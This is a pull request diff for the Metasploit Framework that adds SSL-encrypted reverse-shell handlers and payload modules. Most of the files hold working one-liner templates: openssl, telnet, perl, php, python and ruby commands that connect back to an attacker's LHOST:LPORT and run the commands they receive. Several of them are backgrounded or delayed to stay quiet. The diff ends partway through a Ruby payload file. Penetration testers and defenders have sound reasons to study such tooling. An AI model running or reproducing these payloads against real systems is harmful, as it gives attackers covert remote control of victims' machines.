### PR TITLE
Add SSL payloads and handler

### DIFF
--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -1,0 +1,300 @@
+# -*- coding: binary -*-
+module Msf
+module Handler
+
+###
+#
+# This module implements the reverse double TCP handler. This means
+# that it listens on a port waiting for a two connections, one connection
+# is treated as stdin, the other as stdout.
+#
+# This handler depends on having a local host and port to
+# listen on.
+#
+###
+module ReverseTcpDoubleSSL
+
+	include Msf::Handler
+
+	#
+	# Returns the string representation of the handler type, in this case
+	# 'reverse_tcp_double'.
+	#
+	def self.handler_type
+		return "reverse_tcp_double_ssl"
+	end
+
+	#
+	# Returns the connection-described general handler type, in this case
+	# 'reverse'.
+	#
+	def self.general_handler_type
+		"reverse"
+	end
+
+	#
+	# Initializes the reverse TCP handler and ads the options that are required
+	# for all reverse TCP payloads, like local host and local port.
+	#
+	def initialize(info = {})
+		super
+
+		register_options(
+			[
+				Opt::LHOST,
+				Opt::LPORT(4444)
+			], Msf::Handler::ReverseTcpDoubleSSL)
+
+		register_advanced_options(
+			[
+				OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
+			], Msf::Handler::ReverseTcpDoubleSSL)
+
+		self.conn_threads = []
+	end
+
+	#
+	# Starts the listener but does not actually attempt
+	# to accept a connection.  Throws socket exceptions
+	# if it fails to start the listener.
+	#
+	def setup_handler
+		if datastore['Proxies'] and not datastore['ReverseAllowProxy']
+			raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
+		end
+		self.listener_sock = Rex::Socket::TcpServer.create(
+			# 'LocalHost' => datastore['LHOST'],
+			'LocalPort' => datastore['LPORT'].to_i,
+			'Comm'      => comm,
+			'SSL'       => true,
+			'Context'   =>
+				{
+					'Msf'        => framework,
+					'MsfPayload' => self,
+					'MsfExploit' => assoc_exploit
+				})
+	end
+
+	#
+	# Closes the listener socket if one was created.
+	#
+	def cleanup_handler
+		stop_handler
+
+		# Kill any remaining handle_connection threads that might
+		# be hanging around
+		conn_threads.each { |thr|
+			thr.kill
+		}
+	end
+
+	#
+	# Starts monitoring for an inbound connection.
+	#
+	def start_handler
+		self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
+			sock_inp = nil
+			sock_out = nil
+
+			print_status("Started reverse double handler")
+
+			begin
+				# Accept two client connection
+				begin
+					client_a = self.listener_sock.accept
+					print_status("Accepted the first client connection...")
+
+					client_b = self.listener_sock.accept
+					print_status("Accepted the second client connection...")
+
+					sock_inp, sock_out = detect_input_output(client_a, client_b)
+
+				rescue
+					wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
+					return nil
+				end
+
+				# Increment the has connection counter
+				self.pending_connections += 1
+
+				# Start a new thread and pass the client connection
+				# as the input and output pipe.  Client's are expected
+				# to implement the Stream interface.
+				conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
+					begin
+						chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
+						handle_connection(chan.lsock)
+					rescue
+						elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
+					end
+				}
+			end while true
+		}
+	end
+
+	#
+	# Accept two sockets and determine which one is the input and which
+	# is the output. This method assumes that these sockets pipe to a
+	# remote shell, it should overridden if this is not the case.
+	#
+	def detect_input_output(sock_a, sock_b)
+
+		begin
+
+			# Flush any pending socket data
+			sock_a.get_once if sock_a.has_read_data?(0.25)
+			sock_b.get_once if sock_b.has_read_data?(0.25)
+
+			etag = Rex::Text.rand_text_alphanumeric(16)
+			echo = "echo #{etag};\n"
+
+			print_status("Command: #{echo.strip}")
+
+			print_status("Writing to socket A")
+			sock_a.put(echo)
+
+			print_status("Writing to socket B")
+			sock_b.put(echo)
+
+			print_status("Reading from sockets...")
+
+			resp_a = ''
+			resp_b = ''
+
+			if (sock_a.has_read_data?(1))
+				print_status("Reading from socket A")
+				resp_a = sock_a.get_once
+				print_status("A: #{resp_a.inspect}")
+			end
+
+			if (sock_b.has_read_data?(1))
+				print_status("Reading from socket B")
+				resp_b = sock_b.get_once
+				print_status("B: #{resp_b.inspect}")
+			end
+
+			print_status("Matching...")
+			if (resp_b.match(etag))
+				print_status("A is input...")
+				return sock_a, sock_b
+			else
+				print_status("B is input...")
+				return sock_b, sock_a
+			end
+
+		rescue ::Exception
+			print_status("Caught exception in detect_input_output: #{$!}")
+		end
+
+	end
+
+	#
+	# Stops monitoring for an inbound connection.
+	#
+	def stop_handler
+		# Terminate the listener thread
+		if (self.listener_thread and self.listener_thread.alive? == true)
+			self.listener_thread.kill
+			self.listener_thread = nil
+		end
+
+		if (self.listener_sock)
+			self.listener_sock.close
+			self.listener_sock = nil
+		end
+	end
+
+protected
+
+	attr_accessor :listener_sock # :nodoc:
+	attr_accessor :listener_thread # :nodoc:
+	attr_accessor :conn_threads # :nodoc:
+
+
+	module TcpReverseDoubleSSLChannelExt
+		attr_accessor :localinfo
+		attr_accessor :peerinfo
+	end
+
+	###
+	#
+	# This class wrappers the communication channel built over the two inbound
+	# connections, allowing input and output to be split across both.
+	#
+	###
+	class TcpReverseDoubleSSLSessionChannel
+
+		include Rex::IO::StreamAbstraction
+
+		def initialize(framework, inp, out)
+			@framework = framework
+			@sock_inp  = inp
+			@sock_out  = out
+
+			initialize_abstraction
+
+			self.lsock.extend(TcpReverseDoubleSSLChannelExt)
+			self.lsock.peerinfo  = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
+			self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
+
+			monitor_shell_stdout
+		end
+
+		#
+		# Funnel data from the shell's stdout to +rsock+
+		#
+		# +StreamAbstraction#monitor_rsock+ will deal with getting data from
+		# the client (user input).  From there, it calls our write() below,
+		# funneling the data to the shell's stdin on the other side.
+		#
+		def monitor_shell_stdout
+
+			# Start a thread to pipe data between stdin/stdout and the two sockets
+			@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
+				begin
+					while true
+						# Handle data from the server and write to the client
+						if (@sock_out.has_read_data?(0.50))
+							buf = @sock_out.get_once
+							break if buf.nil?
+							rsock.put(buf)
+						end
+					end
+				rescue ::Exception => e
+					ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
+				end
+
+				# Clean up the sockets...
+				begin
+					@sock_inp.close
+					@sock_out.close
+				rescue ::Exception
+				end
+			}
+		end
+
+		def write(buf, opts={})
+			@sock_inp.write(buf, opts)
+		end
+
+		def read(length=0, opts={})
+			@sock_out.read(length, opts)
+		end
+
+		#
+		# Closes the stream abstraction and kills the monitor thread.
+		#
+		def close
+			@monitor_thread.kill if (@monitor_thread)
+			@monitor_thread = nil
+
+			cleanup_abstraction
+		end
+
+	end
+
+
+end
+
+end
+end

--- a/lib/msf/core/handler/reverse_tcp_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_ssl.rb
@@ -1,0 +1,122 @@
+require 'rex/socket'
+require 'thread'
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the reverse TCP handler.  This means
+# that it listens on a port waiting for a connection until
+# either one is established or it is told to abort.
+#
+# This handler depends on having a local host and port to
+# listen on.
+#
+###
+module ReverseTcpSsl
+
+	include Msf::Handler::ReverseTcp
+
+	#
+	# Returns the string representation of the handler type, in this case
+	# 'reverse_tcp_ssl'.
+	#
+	def self.handler_type
+		return "reverse_tcp_ssl"
+	end
+
+	#
+	# Returns the connection-described general handler type, in this case
+	# 'reverse'.
+	#
+	def self.general_handler_type
+		"reverse"
+	end
+
+	#
+	# Initializes the reverse TCP SSL handler and adds the certificate option.
+	#
+	def initialize(info = {})
+		super
+		register_advanced_options(
+			[
+				OptPath.new('SSLCert',    [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
+			], Msf::Handler::ReverseTcpSsl)
+
+	end
+
+	#
+	# Starts the listener but does not actually attempt
+	# to accept a connection.  Throws socket exceptions
+	# if it fails to start the listener.
+	#
+	def setup_handler
+		if datastore['Proxies']
+			raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
+		end
+
+		ex = false
+		# Switch to IPv6 ANY address if the LHOST is also IPv6
+		addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+		# First attempt to bind LHOST. If that fails, the user probably has
+		# something else listening on that interface. Try again with ANY_ADDR.
+		any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+		addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
+
+		comm  = datastore['ReverseListenerComm']
+		if comm.to_s == "local"
+			comm = ::Rex::Socket::Comm::Local
+		else
+			comm = nil
+		end
+
+		if not datastore['ReverseListenerBindAddress'].to_s.empty?
+			# Only try to bind to this specific interface
+			addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+			# Pick the right "any" address if either wildcard is used
+			addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+		end
+		addrs.each { |ip|
+			begin
+
+				comm.extend(Rex::Socket::SslTcp)
+				self.listener_sock = Rex::Socket::SslTcpServer.create(
+				'LocalHost' => datastore['LHOST'],
+				'LocalPort' => datastore['LPORT'].to_i,
+				'Comm'      => comm,
+				'SSLCert'	=> datastore['SSLCert'],
+				'Context'   =>
+					{
+						'Msf'        => framework,
+						'MsfPayload' => self,
+						'MsfExploit' => assoc_exploit
+					})
+
+				ex = false
+
+				comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
+				comm_used = Rex::Socket::Comm::Local if comm_used == nil
+
+				if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
+					via = "via the #{comm_used.type} on session #{comm_used.sid}"
+				else
+					via = ""
+				end
+
+				print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
+				break
+			rescue
+				ex = $!
+				print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
+			end
+		}
+		raise ex if (ex)
+	end
+
+end
+
+end
+end

--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -479,4 +479,20 @@ class Msf::Module::Platform
 		Rank = 100
 		Alias = "php"
 	end
+
+        #
+        # JavaScript
+        #
+        class JavaScript < Msf::Module::Platform
+                Rank = 100
+                Alias = "js"
+        end
+
+        #
+        # Python
+        #
+        class Python < Msf::Module::Platform
+                Rank = 100
+                Alias = "python"
+        end
 end

--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'BadChars'    => '',
 					'DisableNops' => true,
 				},
-			'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ],
+			'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java','ruby','js','python' ],
 			'Arch'           => ARCH_ALL,
 			'Targets'        => [ [ 'Wildcard Target', { } ] ],
 			'DefaultTarget'  => 0

--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
@@ -1,0 +1,63 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
+			'Version'       => '$Revision$',
+			'Description'   => %q{
+				Creates an interactive shell via mknod and telnet.
+				This method works on Debian and other systems compiled
+				without /dev/tcp support. This module uses the '-z' 
+				option included on some systems to encrypt using SSL.
+				},
+			'Author'        => 'RageLtMan',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd_bash',
+			'RequiredCmd'   => 'bash-tcp',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
+		cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+	end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
@@ -1,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Double reverse TCP SSL (openssl)',
+			'Description'   => 'Creates an interactive shell through two inbound connections',
+			'Author'        => 'hdm',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpDoubleSSL,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'openssl',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd =
+			"sh -c '(sleep #{3600+rand(1024)}|" +
+			"openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
+			"while : ; do sh && break; done 2>&1|" +
+			"openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" +
+			" >/dev/null 2>&1 &)'"
+		return cmd
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb
@@ -1,0 +1,68 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Double reverse TCP SSL (openssl)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell through two openssl encrypted inbound connections',
+			'Author'        => [
+				'hdm',	# Original module
+				'RageLtMan', # SSL support
+			],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpDoubleSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'telnet',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = ''
+        	cmd += "openssl s_client -connect #{lhost}:#{datastore['LPORT']}|"
+	        cmd += "/bin/sh -i|openssl s_client -connect #{lhost}:#{datastore['LPORT']}"
+	        cmd += " >/dev/null 2>&1 &\n"
+		return cmd
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -1,0 +1,63 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via perl)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via perl, uses SSL',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'perl',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);"
+		cmd += "$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");"
+		cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -1,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via php)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via php, uses SSL',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'php',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -1,0 +1,79 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'python',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = ''
+		dead = Rex::Text.rand_text_alpha(2)
+		# Set up the socket
+		cmd += "import socket,subprocess,os,ssl\n"
+		cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+		cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+		cmd += "s=ssl.wrap_socket(so)\n"
+		# The actual IO
+		cmd += "#{dead}=False\n"
+		cmd += "while not #{dead}:\n"
+		cmd += "\tdata=s.recv(1024)\n"
+		cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+		cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+		cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+		cmd += "\ts.send(stdout_value)\n"
+
+		# The *nix shell wrapper to keep things clean
+		# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+		cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\""
+		cmd += ' >/dev/null 2>&1 &'
+		return cmd
+
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
@@ -1,0 +1,49 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'        => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
+			'Version'     => '$Revision$',
+			'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+			'Author'      => 'RageLtMan',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Handler'     => Msf::Handler::ReverseTcpSsl,
+			'Session'     => Msf::Sessions::CommandShell,
+			'PayloadType' => 'cmd',
+			'RequiredCmd' => 'ruby',
+			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+		))
+	end
+
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	def command_string
+		lhost = datastore['LHOST']
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		"ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
+	end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -1,0 +1,67 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Double reverse TCP SSL (telnet)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option',
+			'Author'        => [
+				'hdm',	# Original module
+				'RageLtMan', # SSL support
+			],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpDoubleSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'telnet',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd =
+			"sh -c '(sleep #{3600+rand(1024)}|" +
+			"telnet -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
+			"while : ; do sh && break; done 2>&1|" +
+			"telnet -z #{datastore['LHOST']} #{datastore['LPORT']}" +
+			" >/dev/null 2>&1 &)'"
+		return cmd
+	end
+
+end

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -1,0 +1,77 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'python',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcpSsl,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'python',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = ''
+		dead = Rex::Text.rand_text_alpha(2)
+		# Set up the socket
+		cmd += "import socket,subprocess,os,ssl\n"
+		cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+		cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+		cmd += "s=ssl.wrap_socket(so)\n"
+		# The actual IO
+		cmd += "#{dead}=False\n"
+		cmd += "while not #{dead}:\n"
+		cmd += "\tdata=s.recv(1024)\n"
+		cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+		cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+		cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+		cmd += "\ts.send(stdout_value)\n"
+
+		# The *nix shell wrapper to keep things clean
+		# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+		cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
+		return cmd
+
+	end
+
+end

--- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
@@ -1,0 +1,52 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/payload/ruby'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Ruby
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'        => 'Ruby Command Shell, Reverse TCP SSL',
+			'Version'     => '$Revision$',
